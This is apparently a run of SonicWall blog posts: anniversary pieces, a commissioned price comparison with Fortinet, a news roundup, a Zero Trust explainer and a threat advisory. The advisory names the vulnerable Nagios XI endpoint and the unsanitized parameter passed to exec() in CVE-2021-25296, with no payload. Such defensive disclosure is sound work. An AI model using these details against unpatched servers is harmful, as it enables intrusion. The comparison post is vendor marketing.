Celebrating Three Decades of Employee Excellence

/0 Comments/in /by

When Sonic Systems entered the firewall market in 1996, the company had fewer than 40 employees. Today, the company we now know as SonicWall employs more than 1,600 people in 37 countries.

There are a number of unique benefits for choosing a career at SonicWall, including having the chance to work on the cutting edge of cybersecurity. But while a great cybersecurity portfolio can attract top talent, it takes good leadership and a great corporate culture to keep them.

As we interviewed our employees in celebration of our 30th anniversary, four factors repeatedly emerged as integral to SonicWall’s culture: Opportunity, Family, Diversity and Philanthropy.

Opportunity

“At SonicWall, each of our people can advance their careers through hands-on experience and constant learning while receiving highly competitive compensation and rewards,” SonicWall Chief Administrative Officer Matt Neiderman said.

Ruby W., a SonicWall sales engineer (SE), agreed, citing her willingness to learn as key to both her career development and her ability to continue providing higher levels of customer service.

“Learn as much as you can: Security is ever-changing and you have to change, learn and grow with it,” Ruby said. “Keep up with the changing technology and teach your customers — they will appreciate you and trust you even more.”

Ruby was one of several employees who appreciated that their roles offered opportunities to hone their craft among groups of like-minded individuals. Another was Graphic Designer Mike B., who joined SonicWall in 2019.

“My experience at SonicWall has helped me develop as a designer and improved my career as a whole,” Mike said. “The team is the most skilled and professional group of individuals. Everyone is positive and focused on improving the company’s performance.”

This positive, team-oriented philosophy provides an environment ideally suited for helping employees succeed.

“My favorite thing about SonicWall is that everyone is dedicated to our Boundless Cybersecurity mission. This shared vision results in an amazing collaborative environment where everyone can make an impact,” said Terri O., VP of Marketing.

Family

Even among newer employees, many reported that the tight-knit environment felt more like a family than a group of co-workers.

“We have a good mix of hard-edged accountability and a warm, fuzzy, family-like atmosphere in our company,” said Senior Technical Lead John L.

This view wasn’t limited to just one or two departments, however. Social Media Manager Jamie L. credited her coworkers with creating an environment conducive to both professional and personal growth.

“I have loved my experience at SonicWall. It feels like a big family,” Jamie said. “Everyone that I have come into contact with is kind and willing to help me further my knowledge and help me grow.”

While employees enjoy SonicWall’s close-knit atmosphere, they also expressed appreciation for family-friendly policies such as flexible hours and remote work.

“Over the years, we have watched not only employees grow, but also their families. We all work very hard, but it’s knowing that my SonicWall family is behind me every day that makes it all worthwhile,” Sarah C., VP of Human Resources, said.

This support extends far beyond the daily 9-5. Several employees said their SonicWall family had been there to celebrate things like weddings or the arrival of a new baby, and had also lent their support during life’s challenges.

“A huge standout for me was when my son was diagnosed with cancer,” Tiffany H., Sr. Manager, Inside Sales, said. “I came back to the office and everyone was wearing green (the color for lymphoma) to show me that they were there to support me and my family.”

Diversity

SonicWall employees may all be working together toward a shared goal, but their varied experiences mean that each person brings to bear their own unique contribution. SonicWall has long focused on fostering an inclusive and equitable environment, and this begins with the recruiting and hiring processes.

“We are committed to hiring people from diverse backgrounds and cultures and providing each member of our team meaningful opportunities to contribute to the success of the company,” Neiderman said.

As a result, there is no “typical SonicWall employee” — the company prides itself on both bringing together a diverse group of employees in each of its offices, and on celebrating the different beliefs and values of all its employees.

For decades, SonicWall employees and their families have enjoyed celebrating holidays from across the world, as well as participating in special events with music, food, games, costumes, contests and more.

Due to SonicWall’s global presence, some roles offer an opportunity to experience other cultures more directly.

“I have enjoyed the travel opportunities I have been afforded during my time here at SonicWall,” said Technical Support Sr. Advisor David W. “I’ve been to India and South Korea to complete training and to support major customer deployments. Most of all, I really enjoy learning about different cultures and working with people from diverse backgrounds.”

Sr. Test Principal Engineer Keith C. agreed. “I love SonicWall’s diversity and the opportunity to work with people from all over the world,” he said.

Philanthropy

Senior Director of Demand Generation Diane W. summed up SonicWall’s approach to giving as such: “SonicWall thinks globally and acts locally.”

SonicWall offers employees several opportunities throughout the year to help make their communities a better place. Each December, offices support a local charity with donations — for example, the SonicWall headquarters in Milpitas, Calif., donates to the Second Harvest of Silicon Valley, while the Dallas office supports the North Texas Food Bank.

But while many of our charitable endeavors are built around the idea of “helping out at home,” employees are always willing to answer the call when disaster strikes — regardless of where it occurs.

In spring 2021, for example, India experienced a massive wave of severe COVID-19 infections. During this time of widespread suffering and loss of life, SonicWall employees worldwide came together with donations to help ease the hardship of both fellow employees and the area as a whole.

… and in return, Loyalty

“Our decades of working with channel partners to deliver scalable security solutions means that we are big enough to deliver cutting-edge and cost-effective technology, but small enough to never forget the value of the people behind our success,” Neiderman said.

This is reflected in the number of SonicWall employees who choose to spend their career at SonicWall. Out of 1,600 employees, there are 130 who have been with the company for 10-15 years, 67 employees who have spent 16-20 years working for SonicWall, and 16 who have spent over a fifth of a century with us.

During our 30th anniversary celebration, SonicWall wants to take the opportunity to thank our employees for their hard work and their dedication, but most of all, for their loyalty: Whether it’s your second day or your 20th year, your continued efforts at helping safeguard the world’s networks from cybercrime have helped make SonicWall the company it is today, and your contributions will continue to drive improvements on every front over the next 30 years.

SonicWall NSsp 15700 vs. Fortinet FG 3600E

/0 Comments/in /by

Choosing between two leading enterprise firewalls

Legacy cybersecurity solutions are no match for today’s hyper-distributed businesses. Safeguarding against modern threats requires stronger secure gateways capable of protecting a radically redefined perimeter. To stay ahead of the evolving threats, it’s time for security professionals to embrace modern Next-Generation Firewalls (NGFW).

The firewalls of today are vastly more agile, more capable, and more powerful than when the technology debuted 20 years ago. But not all firewalls are created equal — they come in different form factors, network interfaces and security packages. These packages may or may not include services such as IPS, application control, content filtering, anti-malware, DNS security and cloud management. To further complicate matters, there are enough firewall vendors in the market today that it can be difficult for the average customer to choose the right solution for their environment.

In March 2021, SonicWall commissioned Tolly Group to compare SonicWall NSa 2700 with the Fortinet FG 100F — and their report showed the NSa 2700 is a better choice for medium enterprises. Then, in July 2021, Tolly Group compared the price and performance of two firewalls designed for larger enterprises — SonicWall’s NSsp 15700 to the Fortinet FG 3600E. The two firewalls have a similar form factor and are comparable from a single appliance price point.

When choosing the right security solution, there are three key considerations: price, performance and protection. The ideal choice is the device that costs the least while providing similar performance and a comparable or better feature set than the alternative. Tolly used the published numbers and prices from both vendors to calculate the Total Cost of Ownership (TCO) for a 3-year, High-Availability appliance model with comparable security features. The full report is here. Here are a few of the key findings:

SonicWall’s three-year TCO is less than half that of Fortinet

This report compares SonicWall’s NSsp 15700 Total Secure Essential Edition with Fortinet FG-3600E Unified Threat Protection, both configured in HA mode. The SonicWall solution has a significantly lower TCO mainly because SonicWall does not require the purchase of a firewall license for the second unit. At $885,000, the Fortinet FG 3600E 3-year TCO is more than two times the $440,200 price of the SonicWall NSsp 15700 (see Figure 1).

SonicWall’s advertised threat prevention throughput is more than 2.5 times that of Fortinet

When looking at product data sheets, it’s not uncommon to be overwhelmed with multiple performance numbers. When evaluating a security appliance, you should look for performance numbers that will most closely replicate how you will use the solution in your environment. In the case of a firewall, that number is usually threat protection/prevention with most security features turned on.

While the two firewalls have similar form factor and price per appliance, SonicWall’s solution offers 80 Gbps threat prevention throughput, compared to Fortinet’s 30 Gbps.

SonicWall has a dramatically lower price-to-performance ratio

At the end of the day, what is most important to an organization is how much they have to spend to protect their environment while maximizing performance. For a firewall, that measure is commonly referred to as the price-to-performance ratio and is calculated by dividing the TCO by the relevant performance benchmark.

As detailed in Table 1, the cost of protecting each gigabit per second of network traffic for Fortinet ($29,500) is 5.5 times higher than SonicWall ($5,368).

Conclusion

Firewalls have different pricing, packages, performance, bells and whistles, which can make it difficult to choose between them. Given that a firewall purchase is a long-term investment, it is important to obtain and compare the three- to five-year total cost of ownership as opposed to just looking at list prices. It is clear that SonicWall firewalls, including both the NSa 2700 for medium enterprises and the NSsp 15700 for large enterprises, outperform comparable Fortinet firewalls at a lower total cost of ownership.

Nagios XI Configwizards Command Injection Vulnerability

/in /by

Overview:

  Nagios is an open source host, service and network monitoring program. The product’s functionality is implemented through a number of server-side programs primarily written in PHP with a backend database running MariaDB, a drop-in replacement for Musk. The majority of these programs can be accessed only after successful authentication is performed with the underlying webserver. Nagios XI is a paid version of Nagios which offers greater functionality and performance such as enhanced dashboards, graphs and backend database support compared with Nagios.

  A command injection vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient input validation of the requests submitted to the Windowswmi.inc.php.

  A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in arbitrary command execution with privileges of the web server on the target system.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-25296.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/E:P/RL:O/RC:C).

  Base score is 7.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.7 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  Nagios XI facilitates the management of the tasks to monitor new devices, services, and applications via the Configuration Wizards feature. Configuration wizards includes a set of modules which make it easy for end-users to setup monitor tasks for various services or hosts on a user-friendly interface without needing to understand how Nagios XI works in the backend. Configuration wizards include several modules which are installed by default in Nagios XI installation. The “Windows WMI” module is one of these default modules and relevant to this report. The Configuration Wizards feature can be accessed via the Request-URI

    /url_root/config/monitoringwizard.php

  where url_root is the url root of the Nagios XI application.

  A command injection vulnerability exists in Nagios XI. When processing the requests submitted to the monitoringwizard.php endpoint, the monitoringwizard.php will check if the value of the wizard request parameter is “windowswmi”. If yes, it will call the function windowswmi_configwizard_func() in the windowswmi.inc.php to process the request. The windowswmi_configwizard_func() creates command-line strings which will invoke the program check_wmi_plus.pl to perform various monitoring tasks. The check_wmi_plus.pl provides several command-line arguments. One of them is the “forcetruncateoutput” argument, which limits the length of output printed by the check_wmi_plus.pl. The windowswmi_configwizard_func() will check if the plugin_output_len request parameter exists in the HTTP request. If yes, it will apply the plugin_output_len value to the construction of the check_wmi_plus.pl command-line string as its “forcetruncateoutput” argument, like the command-line string shown below:

    check_wmi_plus.pl ...... --forcetruncateoutput plugin_output_len

  where plugin_output_len is the value of the plugin_output_len request parameter.

  Then, windowswmi_configwizard_func() will run the constructed check_wmi_plus.pl command-line string by PHP exec() function.

  However, windowswmi_configwizard_func() does not sanitize the plugin_output_len parameter value before applying it to the command-line string. An attacker can include command injection characters in the value of the plugin_output_len parameter which are then included in the constructed command line string. This allows for the execution of arbitrary commands on the underlying system when windowswmi_configwizard_func() calls PHP exec() to run the command-line string.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary commands as the apache user.

Triggering the Problem:

  The target system must have the vulnerable product installed and running.
    • The attacker must have network connectivity to the affected ports.
    • The attacker must authenticate to the target system.

Triggering Conditions:

  The attacker authenticates and then sends an HTTP request containing maliciously crafted parameters to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 80/TCP
    • HTTPS, over port 443/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 15480 Nagios XI monitoringwizard.php Command Injection 1
  • IPS: 15668 Nagios XI monitoringwizard.php Command Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released a patch (5.8.0) regarding this vulnerability:
  Vendor Advisory

Cybersecurity News & Trends – 08-27-21

/0 Comments/in /by

The Mid-Year Update to the 2021 SonicWall Cyber Threat Report found its way into the Wall Street Journal, CNN and other news outlets. Plus, SonicWall’s big 30th anniversary earned mentions all over the global news cycle. In industry news, China crushes cyberweakness, Trickbot links, Blackberry’s “BadAlloc,” hackers attack rural sewage, surgeries cancelled, care diverted, and the Dallas Police Department announces a serious breach – four months late.

SonicWall in the News

SonicWall and Fusion BPO Services enter into strategic partnership — CRN India

  • SonicWall has entered into a strategic partnership with Fusion BPO services, a global BPO with headquarters in Kolkata, India and Draper, Utah (US). The new partnership will feature SonicWall’s state-of-the-art next-generation firewalls (NGFW) for SMB, enterprise, and government organizations. Fusion incorporates a wide range of call center services from 18 centers located in nine countries.

The Ruthless Hackers Behind Ransomware Attacks on U.S. Hospitals: ‘They Do Not Care’ — Wall Street Journal

  • The Mid-Year Update to the 2021 SonicWall Cyber Threat Report continues to reverberate. This time by the Wall Street Journal reporting on recent ransomware attacks on hospitals in the U.S. The attacks were devastating: a chain in Las Vegas was all but closed; in Oregon, they shut down monitors tracking patient vital signs, and in New York, they briefly closed a trauma center. In addition, the report notes that a cybercrime gang known as “Ryuk” may account for one-third of the 203 million U.S. ransomware attacks in 2020 cited in SonicWall’s report.

Friday 13: 5 tips to protect yourself from ‘bad luck’ from cyber attacks — CNN Brazil

  • CNN, one of Brazil’s most prominent news outlets, drew a parallel between superstitions associated with “Friday the 13th” and the specter of falling victim to a cyberattack. The reporter playfully warns that readers can avoid the “bad luck” of cyberattacks on a then-upcoming occurrence of the day by taking certain precautions. However, the story turns very serious when it quotes data from the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.

Newest Target of Cyber Attacks: America’s Hospitals — The Crime Report

  • Reporters here cited the Mid-Year Update to the 2021 SonicWall Cyber Threat Report as a reference point for the massive surge in ransomware attacks in the U.S. The story also noted a story from Arstechnica that describes how attackers knocked out staff access to I.T. systems across virtually all operations. The report also pointed out that the Ryuk cybercriminal gang was once called the “Business Club,” tied to Russian government security services.

Cyber threat warning to Fife businesses as attacks’ skyrocket’ — Dunfermline Press

CISA offers government and private sector guidance on ransomware prevention — FinTech Global

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) shared guidance on the roles government and private sector organizations may work together to prevent ransomware data breaches. The story cited the 151% spike in ransomware attacks that was reported in the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total Just 6 Months — CRWE World

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total in Just 6 Months — European Business Magazine

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total in Just 6 Months — Digital Conqurer

SonicWall Cyber Threat Report 2021: 304.7 Million Record Ransomware Attacks In Just 6 Months, Eclipses Whole Of 2020 — SiliconVillage

SonicWall: Record 304.7 Million Ransomware Attacks Eclipse 2020 Global Total In Just 6 Months — MoneyFM

Ransomware was the most common attack among Brazilian companies in 2021 — Bahia Lighthouse

Ransomware was the most common attack among Brazilian companies in 2021 — InfoTec Computadores

Anniversary – 30 years of Sonicwall — Netzpalaver

  • The article notes SonicWall’s 30th anniversary to share its history, significant milestones, the growth of SonicWall technologies, and its commitment to its customers.

SonicWall turns 30: Cybersecurity pioneer celebrates three decades of innovation — All About SECURITY

  • This article also observes SonicWall’s 30th anniversary and shares comments from SonicWall President and CEO, Bill Conner, Exertis’ U.K. and Europe Security Sales Director, Jason Hill, Epicor’s I.T. Director of Hosting and Managed Services, Harry Hartnup, and SonicWall’s SVP and Chief Technology Officer, John Gmuender.

Sonicwall Turns 30: Cybersecurity Pioneer Celebrates Three Decades Of Innovation— SECURITY INSIDER

  • One more article celebrates SonicWall’s 30th anniversary, detailing SonicWall technologies and enduring customer loyalty.

Industry News

Crypto exchange Binance hires former U.S. Treasury criminal investigator — Reuters

  • Crypto exchange agency, Binance, says it appointed a former U.S. Treasury criminal investigator as its global money laundering reporting officer, part of an attempt by one of the world’s largest crypto exchanges to reinvent itself as a regulated financial firm.

China orders annual security reviews for all critical information infrastructure operators — The Register

  • China’s government has introduced rules for protection of critical information infrastructure. The announcement was issued the Cyberspace Administration of China (CAC) notes that security challenges facing critical information infrastructure are severe.

Japanese insurer Tokio Marine discloses ransomware attack — Bleeping Computer

  • Tokio Marine Holdings, a multinational insurance holding company in Japan, announced this week that its Singapore branch, Tokio Marine Insurance Singapore (TMiS), suffered a ransomware attack.

Diavol ransomware sample shows stronger connection to TrickBot gang — Bleeping Computer

  • A new analysis of a Diavol ransomware sample shows a more apparent connection between the gang behind the TrickBot botnet and the evolution of the malware.

BlackBerry’s popular operating system for medical devices affected by critical vulnerabilities — Cyberscoop

  • A critical set of software flaws first revealed in April affects code made by BlackBerry used in countless devices in the medical, automotive and energy sectors, the technology vendor confirmed on Tuesday. The disclosure expands the number of devices at risk due to the “BadAlloc” flaw.

Rural Sewage Plants Hit by Ransomware Attacks in Maine — Security Week

  • Local officials said that a pair of ransomware attacks on sewage treatment plants in rural Maine communities demonstrates that small towns need to be just as vigilant as larger communities in protecting against hackers.

Colonial Pipeline sends breach letters to more than 5,000 after ransomware group accessed SSNs — ZDNet

  • Colonial Pipeline is sending out notification letters to 5,810 current and former employees whose personal information was accessed by the DarkSide ransomware group  during an attack in May. The company admitted in an August 13 letter that on May 6, the ransomware group “acquired certain records” stored in their systems.

Malware campaign uses clever ‘captcha’ to bypass browser warning — Bleeping Computer

  • A malware campaign used a clever captcha prompt to trick users into bypassing browsers warnings to download the Gozi (aka Ursnif) banking trojan. Yesterday, security researcher Malware Hunter Team shared a suspicious URL with BleepingComputer that downloads a file when attempting to watch an embedded YouTube video about a New Jersey women’s prison.

Brazilian government discloses National Treasury ransomware attack — Bleeping Computer

  • The Brazilian Ministry of Economy disclosed a ransomware attack that hit the National Treasury’s computing systems on Friday night, right before the start of the weekend. “On Friday night (the 13th) a ransomware attack on the internal network of the National Treasury Secretariat was identified,” the Brazilian government announced.

Tech Hack Notification Delays Can Leave Corporate Customers in the Lurch — The Wall Street Journal

  • Some tech companies are slow to share details about hacks of their products, leaving customers vulnerable to disruptions and uncertain how to respond as information trickles out. Cyberattacks in which hackers target a service provider and then use that foothold to access their customers’ networks. The report goes on to describe how policy makers in the U.S. and Europe are scrutinizing “weak links.”

T-Mobile Investigating Claims of Massive Customer Data Breach — VICE

  • T-Mobile says it is investigating a forum post claiming to be selling a mountain of personal data. The forum post itself doesn’t mention T-Mobile, but the seller told Motherboard they have obtained data related to over 100 million people and that the data came from T-Mobile servers.

Dallas cops lost 8 T.B. of criminal case data during bungled migration, says the DA… four months later — The Register

  • According to local reports, a bungled data migration of a network drive caused the deletion of 22 terabytes of information from a U.S. police force’s system – including case files in a murder trial. Dallas Police Department confessed to the information blunder last week, revealing in a statement that a data migration exercise carried out at the end of the 2020-21 financial year deleted vast amounts of data from a network drive.

Surgeries canceled, care diverted as Memorial Health responds to cyberattack — S.C. Magazine

  • Memorial Health System in Ohio is currently operating under electronic health record (EHR) downtime procedures and diverting emergency care patients after a cyberattack struck its network during the early hours of Sunday, Aug. 15. All radiology exams and urgent surgical cases scheduled for Aug. 16 have also been canceled as a result.

In Case You Missed It

SonicWall: 30 Years of Partnering to Win

/0 Comments/in /by

SonicWall has always been 100% channel-driven. Today, we’re honored to work with more than 17,000 channel partners worldwide — but even before SonicWall was known as SonicWall, we were working to build partnerships based on trust, loyalty and mutual success.

As early as the mid-1990s, SonicWall (then known as Sonic Systems) had already begun onboarding top resellers, value-added resellers (VARs) and systems integrators. By seeking out partner companies that focused on providing educational institutions and SMBs with high-quality, affordable inter-networking solutions, Sonic Systems was able to achieve tremendous growth in a short amount of time. This growth, in turn, fueled innovations that helped our partners and their customers continue to succeed.

SonicWall Launches Partner Recognition Programs

In recognition of these successful partnerships, in the late 1990s a newly rebranded ‘SonicWALL’ began developing a dedicated partner program. By 2000, this program had five distinct partner program levels — Reseller, Silver, Gold, Platinum and International Distributors — that would later become the foundation of today’s SecureFirst Partner Program.

The partner structure SonicWall currently employs dates back to 2004, when the Medallion Program was launched. This program was refreshed in 2007 to coincide with the launch of SonicWall’s first partner portal, PartnerLink.

In recognition of the unique needs of its Managed Security Services Provider partners, SonicWall announced its first MSSP program in 2005. This program was designed to help its channel partners grow their share of the managed services market and signaled a recognition of these partners that continues to the present day.

Partnering for a Successful Future: Today’s Programs

SonicWall’s partner programs have evolved a great deal since their inception, and today’s programs are more comprehensive and offer more benefits than ever before.

“At SonicWall, we listen,” said HoJin Kim, SonicWall SVP, Worldwide Channel, North American Sales. “We work incredibly hard to provide partners with everything they need in order to not only meet their yearly objectives, but exceed them.”

SecureFirst Partner Program

In 2016, SonicWall introduced the SecureFirst partner program. In the first 150 days, more than 10,000 partners registered to sell within the new program — 20% of which were new to SonicWall. Within a year, the program had grown 500% as partners around the world jumped at the opportunity to reintroduce SonicWall products to their comprehensive offerings.

The program’s ongoing success is due largely to its philosophy of partnering to win. In addition to the program’s goal of accelerating partners’ ability to be thought leaders in the ever-evolving cybersecurity landscape, it also offers a number of perks. These include competitive margins, deal registration protection, technical training, sales enablement, marketing and lead-generation support, and more.

In recognition of our commitment to going above and beyond for our solution providers, in 2021 the SonicWall SecureFirst partner program received a 5-star rating in the 2021 CRN Partner Program Guide. This annual guide provides a conclusive list of the most distinguished partner programs from leading technology companies that provide products and services through the IT channel.

SonicWall University

SonicWall University, an online partner enablement platform designed to keep SecureFirst partner sales representatives, pre-sales and support engineers at the forefront of both cyberthreats and security solutions, was unveiled in 2017. This free, on-demand online training portal offers pathways for partners to earn SecureFirst Sales and Technical Accreditations that directly influence increased revenue attainment.

SonicWall MSSP Program

In 2020, SonicWall’s MSSP program was modernized to empower MSSPs with the resources and tools they need to protect their customers while improving operational efficiency and costs. In addition to branding and customization options, the new MSSP structure empowers SecureFirst partners to consume SonicWall services on either a monthly or annual basis, matching the way they do business.

SonicWall relies on its expansive base to fuel its momentum and is dedicated to continuing to grow programs like these to further meet the needs of our partners in the future.

As SonicWall moves into its third decade, we’d like to take this opportunity to thank our partners for their loyalty and commitment. It is both our mission and our privilege to continue working toward our mutual success in the years to come.

Why SDP Matters in Zero Trust

/0 Comments/in /by

Today’s networks have never been more diverse and distributed. While the network and security used to operate within a physical perimeter, digital transformation has made the old castle-and-moat model of security largely insufficient to protect modern networks. Organizations have hardened their network perimeters with firewalls, VPNs and NACs, but as the network perimeter continues to change, these tools need to evolve as well.

Traditionally, users were allowed to “connect first, authenticate later.” Network security relied on application-level permissions for authorization, giving users a pass into the network perimeter. But in today’s era of rising cybercrime, this implicit trust model puts organization at risk and has enabled far too many successful breaches.

Modern networks need flexible and adaptive security in which the perimeter begins with the users. The SDP (software-defined perimeter) model is built around the idea of “authenticate first, connect later,” giving administrators finely grained access control that is defined by policies and network parameters for each individual user.

SDP architectures include a minimum of five layers of security:

  • Authentication and validation of devices
  • Authentication and authorization of users
  • Two-way encrypted connections
  • Dynamic provisioning of connections
  • Mapping and control of connections to services, while keeping these connections hidden

SDP uses single-packet authorization (SPA) protocol, which validates user or device identity to ensure that network resources are only accessible by authorized users, on a need-to-know basis.

The SDP architecture is made up of three key components:

  • SDP Client: runs on the user’s device
  • SDP Controller: authentication gate keeper
  • SDP Gateway: trust broker to provide secure access to resources
  1. The SDP client makes an access request to the SDP controller. The controller evaluates credentials and authenticates the client as per the access policies.
  2. The SDP controller checks the context and passes the individual network entitlement to the SDP client, along with the signed token to access the authorized network resources.
  3. The SDP client provides network entitlement to the SDP gateway, and the gateway uses it to match applications with the user’s context.
  4. A dynamic network segment is created to the resource or service from the SDP client to the SDP gateway via encrypted tunnels.
  5. The end-to-end network segment is continuously monitored for any context changes.

In contrast with the traditional model, Zero Trust is a network security concept built around the idea that networks should trust nothing and verify everything. Implementing Zero Trust requires verification of anything that attempts to connect to your network, even before granting access, and continuous access validation for the duration of connection.

SDP is one of the best and most advanced ways to implement Zero Trust, as SDP is agnostic to underlying IP infrastructure while securing all network connections and the infrastructure itself. SDP architecture separates the control plane, where trust is established, from the data plane — thus providing least-privilege access to tightly defined micro-segments of the network and resources.

SDP is applied at the network layer before the transport layer and prior to the application of the session layer. A Zero Trust implementation using SDP enables organizations to defend new variations of attack vectors that are constantly surfacing in perimeter-centric networking models.

SonicWall Cloud Edge Secure Access enables a simple Network-as-a-Service (NaaS) for site-to-site and hybrid cloud connectivity to AWS, Azure, Google Cloud and more. By combining Zero-Trust, SDP and least-privilege security, the solution enables organizations to offer remote-work flexibility while still protecting high-value assets from costly security breaches.

It Started with Speed: Seven Generations of SonicWall Products

/0 Comments/in /by

This month marks 30 years since SonicWall’s founding in 1991. To celebrate, we’ll be spending the month of August spotlighting the history, customers, products, partners and people that have helped shape SonicWall over the past three decades and will continue to inspire us in the years ahead.

If asked to name the first SonicWall appliance, many would say the TZ 170 or the original SOHO. But you’d need to go back at least five more years for the answer: the original SonicWall appliance wasn’t a firewall at all, and the original SonicWall wasn’t a firewall company.

In 1995, SonicWall (then called Sonic Systems) introduced its first internet appliance: the QuickStream/3. It was a three-port, multi-protocol remote access server offering remote users access to Apple’s incumbent AppleTalk, as well as then up-and-coming Ethernet technology.

But over the next year, two things happened: The market for Apple peripherals contracted, and Sonic Systems recognized a new opportunity — a lack of affordable firewalls for small- and medium-sized businesses (SMBs).

The SonicWALL Brings Speed, Strength and Security to SMBs

In October 1997, Sonic Systems released the Interpol, a secure, affordable and easy-to-manage NAT/firewall. It represented the first security appliance designed for SMBs, and was a huge hit.

A year later, in 1998, Sonic Systems changed the appliance’s name to the SonicWALL. The name was devised to evoke a combination of speed, strength and security, and was so well received that in 1999, the entire brand followed suit.

The following year, on the heels of a successful initial public offering (IPO), SonicWALL introduced two new appliances: the SOHO, designed for small businesses (the acronym stands for “Small Office, Home Office”) and the PRO, which delivered enterprise-class firewall throughput and VPN concentration to medium-sized businesses and branch offices.

Shortly after the turn of the millennium, SonicWALL introduced the Gen 2 product line, including the SOHO2 and the TELE2, an even more compact appliance for branches and telecommuters (it supported a grand total of five users.)

To help deal with the growing complexity of network security, SonicWALL also announced the Global Management System (GMS), which enabled the management of several SonicWALL appliances from a single place.

The SonicWall TZ 105

The TZ, the TELE3 and Other New Technology

The first Gen 3 appliances, including the SOHO3 and the TELE3, followed just a short year later, in 2001. This rapid advancement pace paid dividends — by 2002, the company had shipped its 250,000th unit — so SonicWALL kept it up. 2003 brought the introduction of Gen 4 products, including the first offering in the award-winning TZ Series: the TZ 170.

Another firewall series still going strong today made its debut in 2007: the NSA Series, designed for mid-sized organizations of 250 users and up. As part of the Gen 5 release, the company introduced the NSA E-5500, the NSA E-6500 and the NSA E-7500.

Displaying its commitment to continued innovation, SonicWALL was also granted its first patent that year: SWUS-001 – U.S. Patent No. 7,158,986.

The SonicWall NSA 220

Far Beyond Firewalls: SonicWall Transforms into a Cybersecurity Leader

The sale of SonicWALL’s 1 millionth unit kicked off the 2010s, and this decade would be marked by a massive uptick in innovation. In the years since its first patent was awarded, SonicWall employees have been granted more than 325 additional patents, many of these for advancements that would come to the fore in the latter half of the decade.

In 2016, SonicWALL — newly rebranded as SonicWall to coincide with a change in both ownership and leadership — released both its Gen 6 line of NGFWs, its largest to date, as well as SonicOS 6.0.

More big announcements would follow in 2018, both of which would further cement SonicWall as a leader in advanced threat protection. At that year’s RSA Conference, the company unveiled the SonicWall Capture Cloud Platform, which tightly integrates security, management, analytics and real-time threat intelligence across the company’s portfolio of security products.

Later that same year, SonicWall announced Real-Time Deep Memory Inspection (RTDMI™), a proprietary machine learning-based memory inspection technology included as part of the SonicWall Advanced Threat Protection (ATP) sandbox service.

In 2019, less than 10 years after its millionth unit was shipped, SonicWall celebrated the sale of its 3 millionth unit. Recognizing that the rapid growth of cybersecurity architectures was creating management complexities, SonicWall introduced the Capture Security Center, a single-pane-of-glass management solution designed to govern the entire range of SonicWall security operations and services.

A Boundless Future: Gen7 and Beyond

March 2020 ushered in the biggest change to the global workforce since the introduction of the PC. As the COVID-19 pandemic swept across the globe, SonicWall helped countless businesses rapidly make the switch to remote work, helping to ensure the survival of both employees and businesses in highly uncertain times.

While this shift was rapid, it was one SonicWall had long been preparing for. With the introduction of the Boundless Cybersecurity model in April 2020, the company cemented its commitment to closing the growing cybersecurity business gap created by a growth in the attack surface, a shortage of cybersecurity personnel and stagnant IT budgets. By allowing organizations to know the unknown, providing unified visibility and control, and employing disruptive economics, SonicWall has helped businesses weather both rapid shifts in the business world and unprecedented increases in cybercrime.

With the needs of today’s highly distributed, highly mobile workforce now fully at the forefront, SonicWall has recently embarked on the most ambitious refresh of its product portfolio in company history, introducing solutions that are already being widely recognized by third-party testing and reporting agencies.

SonicWall’s new Gen 7 next-generation firewall line, which delivers industry-leading performance, high port density and more, is powered by the newest version of SonicWall’s operating system. SonicOS 7 has been redeveloped from the ground up to be the more advanced, agile and user-friendly than any of its predecessors.

Today, SonicWall offers a full cybersecurity portfolio of products, including firewalls, wireless security, secure email, switches, SASE, secure remote and mobile access, endpoint protection, cloud security and more.

But despite three decades of growth, SonicWall has stayed true to the same vision championed by two brothers three decades ago: to make quality cybersecurity products accessible to businesses of all sizes, and to stand behind them.

SonicWall Celebrating Three Decades of Putting Customers First

/0 Comments/in /by

This month marks 30 years since SonicWall’s founding in 1991. To celebrate, we’ll be spending the month of August spotlighting the history, customers, products, partners and people that have helped shape SonicWall over the past three decades and will continue to inspire us in the years ahead.

SonicWall has enjoyed tremendous growth over the past 30 years, but it hasn’t happened by accident. From the beginning, we’ve strived to keep the customer at the forefront of our business — a decision that has taken us from our roots as a small peripherals provider to the full-service cybersecurity leader we’ve become.

Even before the company released its first firewall, SonicWall (then called Sonic Systems) had dedicated itself to helping small- and medium-sized businesses (SMB) find more cost-effective ways to deploy, operate and protect their network. Despite the countless advancements, developments and changes that brought the company from that point to now, we’ve never wavered in our commitment to this mission.

We have expanded on it, however. Today, SonicWall serves more than 500,000 customers in more than 215 countries and territories, and among these are many of the world’s largest organizations, enterprises and government agencies.

